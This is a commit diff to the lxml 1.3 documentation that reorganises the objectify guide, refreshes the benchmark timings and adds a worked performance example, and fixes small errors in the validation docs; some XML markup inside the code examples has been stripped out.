check out the latest development version of lxml +from svn directly, using a command like this:: + + svn co http://codespeak.net/svn/lxml/trunk lxml + +You can also `browse it through the web`_. Please read `how to build lxml +from source`_ first. The `latest CHANGES`_ of the developer version are also +accessible. You can check there if a bug you found has been fixed or a +feature you want has been implemented in the latest trunk version. + +.. _`how to build lxml from source`: build.html +.. _`browse it through the web`: http://codespeak.net/svn/lxml +.. 
_`latest CHANGES`: http://codespeak.net/svn/lxml/trunk/CHANGES.txt + + Mailing list ------------ Modified: lxml/branch/lxml-1.3/doc/mkhtml.py ============================================================================== --- lxml/branch/lxml-1.3/doc/mkhtml.py (original) +++ lxml/branch/lxml-1.3/doc/mkhtml.py Fri Jun 15 11:19:25 2007 @@ -4,10 +4,11 @@ SITE_STRUCTURE = [ ('lxml', ('main.txt', 'intro.txt', 'FAQ.txt', 'compatibility.txt', 'performance.txt', 'build.txt')), - ('Developing with lxml', ('api.txt', 'parsing.txt', 'validation.txt', - 'xpathxslt.txt', 'objectify.txt')), - ('Extending lxml', ('resolvers.txt', 'extensions.txt', 'element_classes.txt', - 'sax.txt', 'capi.txt')), + ('Developing with lxml', ('tutorial.txt', 'api.txt', 'parsing.txt', + 'validation.txt', 'xpathxslt.txt', + 'objectify.txt')), + ('Extending lxml', ('resolvers.txt', 'extensions.txt', + 'element_classes.txt', 'sax.txt', 'capi.txt')), ] RST2HTML_OPTIONS = " ".join([ Modified: lxml/branch/lxml-1.3/doc/objectify.txt ============================================================================== --- lxml/branch/lxml-1.3/doc/objectify.txt (original) +++ lxml/branch/lxml-1.3/doc/objectify.txt Fri Jun 15 11:19:25 2007 @@ -2,6 +2,9 @@ lxml.objectify ============== +:Authors: + Stefan Behnel, Holger Joukl + lxml supports an alternative API similar to the Amara_ bindery or gnosis.xml.objectify_ through a custom Element implementation. The main idea is to hide the usage of XML behind normal Python objects, sometimes referred @@ -17,27 +20,35 @@ not be mixed with other element implementations, to avoid non-obvious behaviour. +The `benchmark page`_ has some hints on performance optimisation of code using +lxml.objectify. + .. _Amara: http://uche.ogbuji.net/tech/4suite/amara/ .. _gnosis.xml.objectify: http://gnosis.cx/download/ +.. _`benchmark page`: performance.html#lxml-objectify .. contents:: .. 
- 1 Setting up lxml.objectify - 2 Creating objectify trees - 3 Element access through object attributes - 4 Namespace handling - 5 ObjectPath - 6 Python data types - 7 Defining additional data classes - 8 Recursive string representation of elements - 9 What is different from ElementTree? - 10 Resetting the API + 1 Setting up lxml.objectify + 2 The lxml.objectify API + 2.1 Creating objectify trees + 2.2 Element access through object attributes + 2.3 Namespace handling + 3 ObjectPath + 4 Python data types + 4.1 Recursive tree dump + 4.2 Recursive string representation of elements + 5 How data types are matched + 5.1 Type annotations + 5.2 The DataElement factory + 5.3 Defining additional data classes + 6 What is different from lxml.etree? Setting up lxml.objectify -------------------------- +========================= -To make use of ``objectify``, you need both the ``lxml.etree`` module and +To set up and use ``objectify``, you need both the ``lxml.etree`` module and ``lxml.objectify``:: >>> from lxml import etree @@ -71,6 +82,13 @@ .. _`namespace specific classes`: element_classes.html#namespace-class-lookup +The lxml.objectify API +====================== + +In ``lxml.objectify``, element trees provide an API that models the behaviour +of normal Python object trees as closely as possible. + + Creating objectify trees ------------------------ @@ -315,7 +333,7 @@ ObjectPath ----------- +========== For both convenience and speed, objectify supports its own path language, represented by the ``ObjectPath`` class:: @@ -452,7 +470,7 @@ Python data types ------------------ +================= The objectify module knows about Python data types and tries its best to let element content behave like them. For example, they support the normal math @@ -485,6 +503,67 @@ >>> print root.d % (1234, 12345) 1234 - 12345 +However, data elements continue to provide the objectify API. This means that +sequence operations such as ``len()``, slicing and indexing (e.g. 
of strings) +cannot behave as the Python types. Like all other tree elements, they show +the normal slicing behaviour of objectify elements:: + + >>> root = objectify.fromstring("testtoast") + >>> print root.a + ' me' # behaves like a string, right? + test me + >>> len(root.a) # but there's only one 'a' element! + 1 + >>> [ a.tag for a in root.a ] + ['a'] + >>> print root.a[0].tag + a + + >>> print root.a + test + >>> [ str(a) for a in root.a[:1] ] + ['test'] + +If you need to run sequence operations on data types, you must ask the API for +the *real* Python value. The string value is always available through the +normal ElementTree ``.text`` attribute. Additionally, all data classes +provide a ``.pyval`` attribute that returns the value as plain Python type:: + + >>> root = objectify.fromstring("test5") + >>> root.a.text + 'test' + >>> root.a.pyval + 'test' + + >>> root.b.text + '5' + >>> root.b.pyval + 5 + +Note, however, that both attributes are read-only in objectify. If you want +to change values, just assign them directly to the attribute:: + + >>> root.a.text = "25" + Traceback (most recent call last): + ... + TypeError: attribute 'text' of 'StringElement' objects is not writable + + >>> root.a.pyval = 25 + Traceback (most recent call last): + ... + TypeError: attribute 'pyval' of 'StringElement' objects is not writable + + >>> root.a = 25 + >>> print root.a + 25 + >>> print root.a.pyval + 25 + +In other words, ``objectify`` data elements behave like immutable Python +types. You can replace them, but not modify them. + + +Recursive tree dump +------------------- To see the data types that are currently used, you can call the module level ``dump()`` function that returns a recursive string representation for @@ -544,64 +623,46 @@ a = 2 [IntElement] a = 3 [IntElement] -However, data elements continue to provide the objectify API. This means that -sequence operations such as ``len()``, slicing and indexing (e.g. of strings) -cannot behave as the Python types. 
Like all other tree elements, they show -the normal slicing behaviour of objectify elements:: - - >>> root = objectify.fromstring("testtoast") - >>> print root.a + ' me' # behaves like a string, right? - test me - >>> len(root.a) # but there's only one 'a' element! - 1 - >>> [ a.tag for a in root.a ] - ['a'] - >>> print root.a[0].tag - a - - >>> print root.a - test - >>> [ str(a) for a in root.a[:1] ] - ['test'] - -If you need to run sequence operations on data types, you must ask the API for -the *real* Python value. The string value is always available through the -normal ElementTree ``.text`` attribute. Additionally, all data classes -provide a ``.pyval`` attribute that returns the value as plain Python type:: - >>> root = objectify.fromstring("test5") - >>> root.a.text - 'test' - >>> root.a.pyval - 'test' +Recursive string representation of elements +------------------------------------------- - >>> root.b.text - '5' - >>> root.b.pyval - 5 +Normally, elements use the standard string representation for str() that is +provided by lxml.etree. You can enable a pretty-print representation for +objectify elements like this:: -Note, however, that both attributes are read-only in objectify. If you want -to change values, just assign them directly to the attribute:: + >>> objectify.enableRecursiveStr() - >>> root.a.text = "25" - Traceback (most recent call last): - ... - TypeError: attribute 'text' of 'StringElement' objects is not writable + >>> root = objectify.fromstring(""" + ... + ... 1 + ... 1.2 + ... 1 + ... true + ... what? + ... + ... + ... """) - >>> root.a.pyval = 25 - Traceback (most recent call last): - ... - TypeError: attribute 'pyval' of 'StringElement' objects is not writable + >>> print str(root) + root = None [ObjectifiedElement] + a = 1 [IntElement] + * attr1 = 'foo' + * attr2 = 'bar' + a = 1.2 [FloatElement] + b = 1 [IntElement] + b = True [BoolElement] + c = 'what?' 
[StringElement] + d = None [NoneElement] + * xsi:nil = 'true' - >>> root.a = 25 - >>> print root.a - 25 +This behaviour can be switched off in the same way:: -In other words, objectify data elements behave like immutable Python types. + >>> objectify.enableRecursiveStr(False) How data types are matched --------------------------- +========================== Objectify uses two different types of Elements. Structural Elements (or tree Elements) represent the object tree structure. Data Elements represent the @@ -636,6 +697,10 @@ classes used in these cases. By default, ``tree_class`` is a class called ``ObjectifiedElement`` and ``empty_data_class`` is a ``StringElement``. + +Type annotations +---------------- + The "type hint" mechanism deploys an XML attribute defined as ``lxml.objectify.PYTYPE_ATTRIBUTE``. It may contain any of the following string values: int, long, float, str, unicode, none:: @@ -727,6 +792,10 @@ l = 5 [IntElement] s = 5 [IntElement] + +The DataElement factory +----------------------- + For convenience, the ``DataElement()`` factory creates an Element with a Python value in one step. You can pass the required Python type name or the XSI type name:: @@ -863,45 +932,8 @@ after all references are gone and the Python object is garbage collected. -Recursive string representation of elements -------------------------------------------- - -Normally, elements use the standard string representation for str() that is -provided by lxml.etree. You can enable a pretty-print representation for -objectify elements like this:: - - >>> objectify.enableRecursiveStr() - - >>> root = objectify.fromstring(""" - ... - ... 1 - ... 1.2 - ... 1 - ... true - ... what? - ... - ... - ... """) - - >>> print str(root) - root = None [ObjectifiedElement] - a = 1 [IntElement] - * attr1 = 'foo' - * attr2 = 'bar' - a = 1.2 [FloatElement] - b = 1 [IntElement] - b = True [BoolElement] - c = 'what?' 
[StringElement] - d = None [NoneElement] - * xsi:nil = 'true' - -This behaviour can be switched off in the same way:: - - >>> objectify.enableRecursiveStr(False) - - -What is different from ElementTree? ------------------------------------ +What is different from lxml.etree? +================================== Such a different Element API obviously implies some side effects to the normal behaviour of the rest of the API. @@ -914,7 +946,8 @@ can access all children with the ``iterchildren()`` method on elements or retrieve a list by calling the ``getchildren()`` method. -* The find, findall and findtext methods use a different implementation as - they rely on the original iteration scheme. This has the disadvantage that - they may not be 100% backwards compatible, and the additional advantage that - they now support any XPath expression. +* The find, findall and findtext methods require a different implementation + based on ETXPath. In ``lxml.etree``, they use a Python implementation based + on the original iteration scheme. This has the disadvantage that they may + not be 100% backwards compatible, and the additional advantage that they now + support any XPath expression. Modified: lxml/branch/lxml-1.3/doc/performance.txt ============================================================================== --- lxml/branch/lxml-1.3/doc/performance.txt (original) +++ lxml/branch/lxml-1.3/doc/performance.txt Fri Jun 15 11:19:25 2007 @@ -1,40 +1,98 @@ +==================== Benchmarks and Speed ==================== +:Author: + Stefan Behnel + +.. meta:: + :description: Performance evaluation of lxml and ElementTree + :keywords: lxml performance, lxml.etree, lxml.objectify, benchmarks, ElementTree + + As an XML library, lxml.etree is very fast. It is also slow. As with all software, it depends on what you do with it. Rest assured that lxml is fast enough for most applications, so lxml is probably somewhere between 'fast enough' and 'the best choice' for yours. 
-This text describes where lxml.etree (lxe) excels, gives hints on some -performance traps and compares the overall performance to the original -ElementTree_ (ET) and cElementTree_ (cET) libraries by Fredrik Lundh. The -cElementTree library is a fast C-implementation of the original ElementTree. +This text describes where lxml.etree (abbreviated to 'lxe') excels, gives +hints on some performance traps and compares the overall performance to the +original ElementTree_ (ET) and cElementTree_ (cET) libraries by Fredrik Lundh. +The cElementTree library is a fast C-implementation of the original +ElementTree. .. _ElementTree: http://effbot.org/zone/element-index.htm .. _cElementTree: http://effbot.org/zone/celementtree.htm +.. contents:: +.. + 1 General notes + 2 How to read the timings + 3 Parsing and Serialising + 4 The ElementTree API + 4.1 Child access + 4.2 Element creation + 4.3 Merging different sources + 4.4 deepcopy + 4.5 Tree traversal + 5 XPath + 6 A longer example + 7 lxml.objectify + 7.1 ObjectPath + 7.2 Caching Elements + 7.3 Further optimisations + + +General notes +============= + +First thing to say: there *is* an overhead involved in having a DOM-like C +library mimic the ElementTree API. As opposed to ElementTree, lxml has to +generate Python representations of tree nodes on the fly when asked for them, +and the internal tree structure of libxml2 results in a higher maintenance +overhead than the simpler top-down structure of ElementTree. What this means +is: the more of your code runs in Python, the less you can benefit from the +speed of lxml and libxml2. Note, however, that this is true for most +performance-critical Python applications. No one would implement Fourier +transformations in pure Python when you can use NumPy. + +The up side then is that lxml provides powerful tools like tree iterators, +XPath and XSLT, that can handle complex operations at the speed of C.
Their +pythonic API in lxml makes them so flexible that most applications can easily +benefit from them. + + +How to read the timings +======================= + The statements made here are backed by the (micro-)benchmark scripts `bench_etree.py`_, `bench_xpath.py`_ and `bench_objectify.py`_ that come with -the lxml source distribution. The timings cited below compare lxml 1.3 (with -libxml2 2.6.26) to the ElementTree and cElementTree versions shipped with -CPython 2.5 (based on ElementTree 1.2.6). They were run single-threaded on a -1.8GHz Intel Core Duo machine. +the lxml source distribution. They are distributed under the same BSD license +as lxml itself, and the lxml project would like to promote them as a general +benchmarking suite for all ElementTree implementations. New benchmarks are +very easy to add as tiny test methods, so if you write a performance test for +a specific part of the API yourself, please consider sending it to the lxml +mailing list. + +The timings cited below compare lxml 1.3 (with libxml2 2.6.27) to the +ElementTree and cElementTree versions shipped with CPython 2.5 (based on +ElementTree 1.2.6). They were run single-threaded on a 1.8GHz Intel Core Duo +machine under Ubuntu Linux 7.04 (Feisty). .. _`bench_etree.py`: http://codespeak.net/svn/lxml/branch/lxml-1.3/benchmark/bench_etree.py .. _`bench_xpath.py`: http://codespeak.net/svn/lxml/branch/lxml-1.3/benchmark/bench_xpath.py .. _`bench_objectify.py`: http://codespeak.net/svn/lxml/branch/lxml-1.3/benchmark/bench_objectify.py The scripts run a number of simple tests on the different libraries, using -different XML tree configurations: different tree sizes, with or without -attributes (-/A), with or without ASCII or unicode text (-/S/U), and either -against a tree or its serialised form (T/X). 
In the result extracts cited -below, T1 refers to a 3-level tree with many children at the third level, T2 -is swapped around to have many children below the root element, T3 is a deep -tree with few children at each level and T4 is a small tree, slightly broader -than deep. If repetition is involved, this usually means running the -benchmark in a loop over all children of the tree root, otherwise, the -operation is run on the root node (C/R). +different XML tree configurations: different tree sizes (T1-4), with or +without attributes (-/A), with or without ASCII string or unicode text +(-/S/U), and either against a tree or its serialised XML form (T/X). In the +result extracts cited below, T1 refers to a 3-level tree with many children at +the third level, T2 is swapped around to have many children below the root +element, T3 is a deep tree with few children at each level and T4 is a small +tree, slightly broader than deep. If repetition is involved, this usually +means running the benchmark in a loop over all children of the tree root, +otherwise, the operation is run on the root node (C/R). As an example, the character code ``(SATR T1)`` states that the benchmark was running for tree T1, with plain string text (S) and attributes (A). It was @@ -44,31 +102,14 @@ measurable. It is therefore not always possible to compare the absolute timings of, say, a single access benchmark (which usually loops) and a 'get all in one step' benchmark, which already takes enough time to be measurable -and is therefore measured as is. Take a look at the concrete benchmarks in -the scripts to understand how the numbers compare. - -.. contents:: -.. - 1 Bad things first - 2 Parsing and Serialising - 3 The ElementTree API - 4 Tree traversal - 5 XPath - 6 lxml.objectify - - -Bad things first ----------------- - -First thing to say: there *is* an overhead involved in having a DOM-like C -library mimic the ElementTree API. 
As opposed to ElementTree, lxml has to -generate Python objects on the fly when asked for them. What this means is: -the more of your code runs in Python, the slower your application gets. Note, -however, that this is true for most performance critical Python applications. +and is therefore measured as is. An example is the index access to a single +child, which cannot be compared to the timings for ``getchildren()``. Take a +look at the concrete benchmarks in the scripts to understand how the numbers +compare. Parsing and Serialising ------------------------ +======================= These are areas where lxml excels. The reason is that both parts are executed entirely at the C level, without major interaction with Python code. The @@ -111,30 +152,36 @@ ET : parse_stringIO (UAXR T3) 163.5361 msec/pass The expat parser allows cET to be up to 80% faster than lxml on plain parser -performance. Similar timings can be observer for the ``iterparse()`` -function. However, if you take a complete serialize-parse cycle, the numbers +performance. Similar timings can be observed for the ``iterparse()`` +function. 
However, if you take a complete input-output cycle, the numbers will look similar to these:: - lxe: write_utf8_parse_stringIO (S-TR T1) 316.6230 msec/pass - cET: write_utf8_parse_stringIO (S-TR T1) 592.1209 msec/pass - ET : write_utf8_parse_stringIO (S-TR T1) 817.9121 msec/pass - - lxe: write_utf8_parse_stringIO (UATR T3) 49.9680 msec/pass - cET: write_utf8_parse_stringIO (UATR T3) 434.6111 msec/pass - ET : write_utf8_parse_stringIO (UATR T3) 574.1441 msec/pass - - lxe: write_utf8_parse_stringIO (SATR T4) 1.2789 msec/pass - cET: write_utf8_parse_stringIO (SATR T4) 12.2640 msec/pass - ET : write_utf8_parse_stringIO (SATR T4) 15.6620 msec/pass + lxe: write_utf8_parse_stringIO (S-TR T1) 166.3210 msec/pass + cET: write_utf8_parse_stringIO (S-TR T1) 581.2099 msec/pass + ET : write_utf8_parse_stringIO (S-TR T1) 803.5331 msec/pass + + lxe: write_utf8_parse_stringIO (UATR T2) 184.4249 msec/pass + cET: write_utf8_parse_stringIO (UATR T2) 671.5119 msec/pass + ET : write_utf8_parse_stringIO (UATR T2) 924.3481 msec/pass + + lxe: write_utf8_parse_stringIO (S-TR T3) 9.1329 msec/pass + cET: write_utf8_parse_stringIO (S-TR T3) 77.9850 msec/pass + ET : write_utf8_parse_stringIO (S-TR T3) 157.0492 msec/pass + + lxe: write_utf8_parse_stringIO (SATR T4) 1.3900 msec/pass + cET: write_utf8_parse_stringIO (SATR T4) 12.6081 msec/pass + ET : write_utf8_parse_stringIO (SATR T4) 16.2580 msec/pass For applications that require a high parser throughput and do little serialization, cET is the best choice. Also for iterparse applications that extract small amounts of data from large XML data sets. If it comes to -round-trip performance, however, lxml tends to be 3-4 times faster in total. +round-trip performance, however, lxml tends to be 3-4 times faster in +total. So, whenever the input documents are not considerably bigger than the +output, lxml is the clear winner. 
The ElementTree API -------------------- +=================== Since all three libraries implement the same API, their performance is easy to compare in this area. A major disadvantage for lxml's performance is the @@ -144,9 +191,9 @@ (given in seconds):: lxe: -- S- U- -A SA UA - T1: 0.1155 0.1154 0.1153 0.1159 0.1181 0.1158 - T2: 0.1183 0.1197 0.1200 0.1267 0.1261 0.1264 - T3: 0.0341 0.0312 0.0314 0.0726 0.0717 0.0720 + T1: 0.1181 0.1080 0.1074 0.1088 0.1087 0.1099 + T2: 0.1103 0.1109 0.1164 0.1241 0.1203 0.1231 + T3: 0.0297 0.0309 0.0297 0.0716 0.0704 0.0703 T4: 0.0005 0.0004 0.0004 0.0014 0.0014 0.0014 cET: -- S- U- -A SA UA T1: 0.0290 0.0271 0.0275 0.0297 0.0273 0.0274 @@ -165,22 +212,26 @@ are no longer referenced. ET and cET represent the tree itself through these objects, which reduces the overhead in creating them. + +Child access +------------ + The same reason makes operations like ``getchildren()`` more costly in lxml. Where ET and cET can quickly create a shallow copy of their list of children, lxml has to create a Python object for each child and collect them in a list:: - lxe: root_getchildren (--TR T2) 0.3500 msec/pass + lxe: root_getchildren (--TR T2) 0.1960 msec/pass cET: root_getchildren (--TR T2) 0.0150 msec/pass ET : root_getchildren (--TR T2) 0.0091 msec/pass When accessing single children, however, e.g. by index, this handicap is negligible:: - lxe: first_child (--TR T2) 0.2499 msec/pass + lxe: first_child (--TR T2) 0.2289 msec/pass cET: first_child (--TR T2) 0.2048 msec/pass ET : first_child (--TR T2) 0.9291 msec/pass - lxe: last_child (--TR T1) 0.2511 msec/pass + lxe: last_child (--TR T1) 0.2310 msec/pass cET: last_child (--TR T1) 0.2148 msec/pass ET : last_child (--TR T1) 0.9191 msec/pass @@ -188,14 +239,18 @@ cET use Python lists here, which are based on arrays. 
The data structure used by libxml2 is a linked tree, and thus, a linked list of children:: - lxe: middle_child (--TR T1) 0.2921 msec/pass + lxe: middle_child (--TR T1) 0.2759 msec/pass cET: middle_child (--TR T1) 0.2069 msec/pass ET : middle_child (--TR T1) 0.9291 msec/pass - lxe: middle_child (--TR T2) 1.9028 msec/pass + lxe: middle_child (--TR T2) 1.7111 msec/pass cET: middle_child (--TR T2) 0.2089 msec/pass ET : middle_child (--TR T2) 0.9360 msec/pass + +Element creation +---------------- + As opposed to ET, libxml2 has a notion of documents that each element must be in. This results in a major performance difference for creating independent Elements that end up in independently created documents:: @@ -208,11 +263,11 @@ are supposed to end up in, either as SubElements of an Element or using the explicit ``Element.makeelement()`` call:: - lxe: makeelement (--TC T2) 2.5990 msec/pass + lxe: makeelement (--TC T2) 2.3680 msec/pass cET: makeelement (--TC T2) 0.3128 msec/pass ET : makeelement (--TC T2) 1.6940 msec/pass - lxe: create_subelements (--TC T2) 2.3072 msec/pass + lxe: create_subelements (--TC T2) 2.2051 msec/pass cET: create_subelements (--TC T2) 0.2370 msec/pass ET : create_subelements (--TC T2) 3.2189 msec/pass @@ -221,6 +276,10 @@ choice. Note, however, that the serialisation performance may even out this advantage, especially for smaller trees and trees with many attributes. + +Merging different sources +------------------------- + A critical action for lxml is moving elements between document contexts. It requires lxml to do recursive adaptations throughout the moved tree structure. @@ -254,19 +313,29 @@ cET: replace_children_element (--TC T1) 0.0238 msec/pass ET : replace_children_element (--TC T1) 0.1628 msec/pass -You should keep this difference in mind when you merge very large trees. On -the other hand, deep copying a tree is fast in lxml:: +You should keep this difference in mind when you merge very large trees. 
+ + +deepcopy +-------- + +Deep copying a tree is fast in lxml:: + + lxe: deepcopy_all (--TR T1) 11.0400 msec/pass + cET: deepcopy_all (--TR T1) 119.6141 msec/pass + ET : deepcopy_all (--TR T1) 451.2160 msec/pass - lxe: deepcopy (--TC T1) 10.6010 msec/pass - cET: deepcopy (--TC T1) 220.2251 msec/pass - ET : deepcopy (--TC T1) 463.7730 msec/pass - - lxe: deepcopy (--TC T3) 8.2979 msec/pass - cET: deepcopy (--TC T3) 53.8740 msec/pass - ET : deepcopy (--TC T3) 118.2799 msec/pass + lxe: deepcopy_all (-ATR T2) 13.5410 msec/pass + cET: deepcopy_all (-ATR T2) 135.2482 msec/pass + ET : deepcopy_all (-ATR T2) 476.1350 msec/pass -So, for example, if you often need to create independent subtrees from a large -tree that you have parsed in, lxml is by far the best choice here. + lxe: deepcopy_all (S-TR T3) 4.2889 msec/pass + cET: deepcopy_all (S-TR T3) 36.0429 msec/pass + ET : deepcopy_all (S-TR T3) 113.4322 msec/pass + +So, for example, if you have a database-like scenario where you parse in a +large tree and then search and copy independent subtrees from it for further +processing, lxml is by far the best choice here. Tree traversal @@ -274,36 +343,36 @@ Another area where lxml is very fast is iteration for tree traversal. 
If your algorithms can benefit from step-by-step traversal of the XML tree and -especially if few elements are of interest or the element tag name is known, -lxml is a good choice:: +especially if few elements are of interest or the target element tag name is +known, lxml is a good choice:: - lxe: getiterator_all (--TR T2) 10.3800 msec/pass + lxe: getiterator_all (--TR T2) 6.4790 msec/pass cET: getiterator_all (--TR T2) 28.2831 msec/pass ET : getiterator_all (--TR T2) 26.0720 msec/pass - lxe: getiterator_islice (--TR T2) 0.1140 msec/pass + lxe: getiterator_islice (--TR T2) 0.0892 msec/pass cET: getiterator_islice (--TR T2) 0.2460 msec/pass ET : getiterator_islice (--TR T2) 26.6550 msec/pass - lxe: getiterator_tag (--TR T2) 0.3879 msec/pass + lxe: getiterator_tag (--TR T2) 0.3850 msec/pass cET: getiterator_tag (--TR T2) 9.3720 msec/pass ET : getiterator_tag (--TR T2) 22.8221 msec/pass - lxe: getiterator_tag_all (--TR T2) 0.8819 msec/pass + lxe: getiterator_tag_all (--TR T2) 0.7222 msec/pass cET: getiterator_tag_all (--TR T2) 27.2939 msec/pass ET : getiterator_tag_all (--TR T2) 22.8271 msec/pass -This similarly shows in ``Element.findall()``:: +This translates directly into similar timings for ``Element.findall()``:: - lxe: findall (--TR T2) 10.9370 msec/pass + lxe: findall (--TR T2) 6.8321 msec/pass cET: findall (--TR T2) 28.8639 msec/pass ET : findall (--TR T2) 27.1060 msec/pass - lxe: findall (--TR T3) 2.1989 msec/pass + lxe: findall (--TR T3) 1.3590 msec/pass cET: findall (--TR T3) 8.9881 msec/pass ET : findall (--TR T3) 6.4890 msec/pass - lxe: findall_tag (--TR T2) 0.9520 msec/pass + lxe: findall_tag (--TR T2) 0.9229 msec/pass cET: findall_tag (--TR T2) 27.2651 msec/pass ET : findall_tag (--TR T2) 22.7208 msec/pass @@ -316,7 +385,7 @@ XPath ------ +===== The following timings are based on the benchmark script `bench_xpath.py`_. 
@@ -359,8 +428,126 @@ lxe: xpath_class_repeat (--TC T4) 1.0269 msec/pass +A longer example +================ + +A while ago, Uche Ogbuji posted a `benchmark proposal`_ that would read in a +3MB XML version of the `Old Testament`_ of the Bible and look for the word +*begat* in all verses. Apparently, it is contained in 120 out of almost 24000 +verses. This is easy to implement in ElementTree using ``findall()``. +However, the fastest way to do this is obviously ``iterparse()``, as most of +the data is not of any interest. + +.. _`benchmark proposal`: http://www.onlamp.com/pub/wlg/6291 +.. _`Old Testament`: http://www.ibiblio.org/bosak/xml/eg/religion.2.00.xml.zip + +Now, Uche's original proposal was more or less the following:: + + def bench_ET(): + tree = ElementTree.parse("ot.xml") + result = [] + for v in tree.findall("//v"): + text = v.text + if 'begat' in text: + result.append(text) + return len(result) + +which takes about one second on my machine today. The faster ``iterparse()`` +variant looks like this:: + + def bench_ET_iterparse(): + result = [] + for event, v in ElementTree.iterparse("ot.xml"): + if v.tag == 'v': + text = v.text + if 'begat' in text: + result.append(text) + v.clear() + return len(result) + +The improvement is about 10%. At the time I first tried (early 2006), lxml +didn't have ``iterparse()`` support, but the ``findall()`` variant was already +faster than ElementTree. This changes immediately when you switch to +cElementTree. The latter only needs 0.17 seconds to do the trick today and +only some impressive 0.10 seconds when running the iterparse version. And +even back then, it was quite a bit faster than what lxml could achieve. + +Since then, lxml has matured a lot and has gotten much faster. The iterparse +variant now runs in 0.14 seconds, and if you remove the ``v.clear()``, it is +even a little faster (which isn't the case for cElementTree). 
When you move +the whole thing to a pure XPath implementation, it will look like this:: + + def bench_lxml_xpath_all(): + tree = etree.parse("ot.xml") + result = tree.xpath("//v[contains(., 'begat')]/text()") + return len(result) + +This runs in about 0.13 seconds and is about the shortest possible +implementation (in lines of Python code) that I could come up with. Now, this +is already a rather complex XPath expression compared to the simple "//v" +ElementPath expression we started with. Since this is also valid XPath, let's +try this instead:: + + def bench_lxml_xpath(): + tree = etree.parse("ot.xml") + result = [] + for v in tree.xpath("//v"): + text = v.text + if 'begat' in text: + result.append(text) + return len(result) + +This gets us down to 0.12 seconds, thus showing that a generic XPath +evaluation engine cannot always compete with a simpler, tailored solution. +However, since this is not much different from the original findall variant, +we can remove the complexity of the XPath call completely and just go with +what we had in the beginning. Under lxml, this runs in the same 0.12 seconds. + +But there is one thing left to try. We can replace the simple ElementPath +expression with a native tree iterator:: + + def bench_lxml_getiterator(): + tree = etree.parse("ot.xml") + result = [] + for v in tree.getiterator("v"): + text = v.text + if 'begat' in text: + result.append(text) + return len(result) + +This implements the same thing, just without the overhead of parsing and +evaluating a path expression. And this makes it another bit faster, down to +0.11 seconds. For comparison, cElementTree runs this version in 0.17 seconds. + +So, what have we learned? + +* Python code is not slow. The pure XPath solution was not even as fast as + the first shot Python implementation. In general, a few more lines in + Python make things more readable, which is much more important than the last + 5% of performance. 
+ +* It's important to know the available options - and it's worth starting with + the most simple one. In this case, a programmer would then probably have + started with ``getiterator("v")`` or ``iterparse()``. Either of them would + already have been the most efficient, depending on which library is used. + +* It's not always worth optimising. After all that hassle we got from 0.12 + seconds for the initial implementation to 0.11 seconds. Switching over to + cElementTree and writing an ``iterparse()`` based version would have given + us 0.10 seconds - not a big difference for 3MB of XML. + +* Take care what operation is really dominating in your use case. If we split + up the operations, we can see that lxml is slightly slower than cElementTree + on ``parse()`` (both about 0.06 seconds), but more visibly slower on + ``iterparse()``: 0.07 versus 0.10 seconds. However, tree iteration in lxml + is incredibly fast, so it can be better to parse the whole tree and then + iterate over it rather than using ``iterparse()`` to do both in one step. + Or, you can just wait for the lxml authors to optimise iterparse in one of + the next releases... + + lxml.objectify --------------- +============== The following timings are based on the benchmark script `bench_objectify.py`_. @@ -376,6 +563,10 @@ API, the create-discard cycles can become a bottleneck, as elements have to be instantiated over and over again. + +ObjectPath +---------- + ObjectPath can be used to speed up the access to elements that are deep in the tree. It avoids step-by-step Python element instantiations along the path, which can substantially improve the access time:: @@ -399,6 +590,10 @@ Note, however, that parsing ObjectPath expressions is not for free either, so this is most effective for frequently accessing the same element. + +Caching Elements +---------------- + A way to improve the normal attribute access time is static instantiation of the Python objects, thus trading memory for speed.
Just create a cache dictionary and run:: @@ -436,12 +631,17 @@ is most effective for largely immutable trees. You should consider using a set instead of a list in this case and add new elements by hand. + +Further optimisations +--------------------- + Here are some more things to try if optimisation is required: * A lot of time is usually spent in tree traversal to find the addressed - elements in the tree. If you often work in subtrees, assign the parent of - the subtree to a variable or pass it into functions instead of starting at - the root. This allows accessing its descendents more directly. + elements in the tree. If you often work in subtrees, do what you would also + do with deep Python objects: assign the parent of the subtree to a variable + or pass it into functions instead of starting at the root. This allows + accessing its descendents more directly. * Try assigning data values directly to attributes instead of passing them through DataElement. Modified: lxml/branch/lxml-1.3/doc/validation.txt ============================================================================== --- lxml/branch/lxml-1.3/doc/validation.txt (original) +++ lxml/branch/lxml-1.3/doc/validation.txt Fri Jun 15 11:19:25 2007 @@ -15,7 +15,7 @@ .. 1 DTD 2 RelaxNG - 2 XMLSchema + 3 XMLSchema The usual setup procedure:: @@ -78,6 +78,10 @@ >>> relaxng_doc = etree.parse(f) >>> relaxng = etree.RelaxNG(relaxng_doc) +Alternatively, pass a filename to the ``file`` keyword argument to parse from +a file. This also enables correct handling of include files from within the +RelaxNG parser. + You can then validate some ElementTree document against the schema. You'll get back True if the document is valid against the Relax NG schema, and False if not:: @@ -125,8 +129,8 @@ You can see that the error (ERROR) happened during RelaxNG validation (RELAXNGV). The message then tells you what went wrong. Note that this error -is local to the RelaxNG object. 
It will only contain log entries that -appeares during the validation. The DocumentInvalid exception raised by the +log is local to the RelaxNG object. It will only contain log entries that +appeared during the validation. The DocumentInvalid exception raised by the ``assertValid`` method above provides access to the global error log (like all other lxml exceptions). @@ -142,10 +146,9 @@ XMLSchema --------- -lxml.etree also has a XML Schema (XSD) support, using the class -lxml.etree.XMLSchema. This support is very similar to the Relax NG -support. The class can be given an ElementTree object to construct a -XMLSchema validator:: +lxml.etree also has XML Schema (XSD) support, using the class +lxml.etree.XMLSchema. The API is very similar to the Relax NG and DTD +classes. Pass an ElementTree object to construct a XMLSchema validator:: >>> f = StringIO('''\ ... @@ -160,9 +163,9 @@ >>> xmlschema_doc = etree.parse(f) >>> xmlschema = etree.XMLSchema(xmlschema_doc) -You can then validate some ElementTree document with this. Like with -RelaxNG, you'll get back true if the document is valid against the XML -schema, and false if not:: +You can then validate some ElementTree document with this. Like with RelaxNG, +you'll get back true if the document is valid against the XML schema, and +false if not:: >>> valid = StringIO('') >>> doc = etree.parse(valid) @@ -174,8 +177,8 @@ >>> xmlschema.validate(doc2) 0 -Calling the schema object has the same effect as calling its validate -method. This is sometimes used in conditional statements:: +Calling the schema object has the same effect as calling its validate method. +This is sometimes used in conditional statements:: >>> invalid = StringIO('') >>> doc2 = etree.parse(invalid) @@ -196,7 +199,7 @@ [...] 
